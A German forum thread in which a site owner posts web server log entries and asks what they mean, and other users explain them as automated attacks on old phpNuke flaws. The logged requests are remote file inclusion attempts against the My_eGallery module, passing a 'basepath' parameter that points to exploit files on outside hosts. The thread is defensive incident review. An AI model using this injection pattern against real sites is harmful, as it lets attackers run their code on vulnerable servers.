Suche

[Eismann1976]

Ich hab gerade mal so meine Logs durchgesehen und dabei folgenden Eintrag gefunden.

143.107.21.61 - - [14/Nov/2007:11:51:36 +0100] "GET /modules/My_eGallery/index.php?basepath=http://212.126.26.181/~kamila/exp667.txt? HTTP/1.1" 404 1134

85.119.242.74 - - [14/Nov/2007:11:27:22 +0100] "GET /modules/My_eGallery/index.php?basepath=http://www.displaysakha.ru/education/db?? HTTP/1.1" 404 1134

Kann mir wer sagen was da versucht wurde aufzurufen?

Vielleicht kann mich ja mal wer aufklären.

Gruß Eismann

[insanehsp]

Also ich habe da nicht viel ahnung von, aber die beiden textinhalte sehen mir nach hackbots aus

http://212.126.26.181/~kamila/exp667.txt
http://www.displaysakha.ru/education/db?

Vielleicht Grasen die so durch das netz und suchen nach angriffbaren Seiten? .... Könnte ich mir vorstellen, aber da wird wahrscheinlich noch jemand fachkundigeres etwas zu sagen können

[Eismann1976]

Die Dateien hab ich mir schon angesehen und vermute das auch.

Ich mach mir da z.Zt. keine großen Sorgen. Die Anfrage wurde ja mit 404 beantwortet.

ABER

Da ich meinen Server gerade neu machen darf nachdem mein phpmyadmin über Tage attakiert und schließlich gehackt wurde, schau ich nun besonders empfindlich auf die Logs.

Die Angriffe auf phpmyadmin sehe ich jetzt zwar immernoch (aber sie laufen jetzt ins Leere) jedoch finde ich zwischendrin immer wieder solche Aufrufe.
Das Modul ist ja Standartmäßig auch im PMX dabei und ich vermute mal es ist gegen solche Angriffe geschützt aber ich dachte mir eine kurze Nachfrage kann nicht schaden.

Gruß Eismann

[Andi]

Moin

das sind die üblichen Dumm-Hackversuche zu veralteten phpnuke-Sicherheitslücken...
Hier speziell der: http://www.pragmamx.org/Forum-topic-9178.html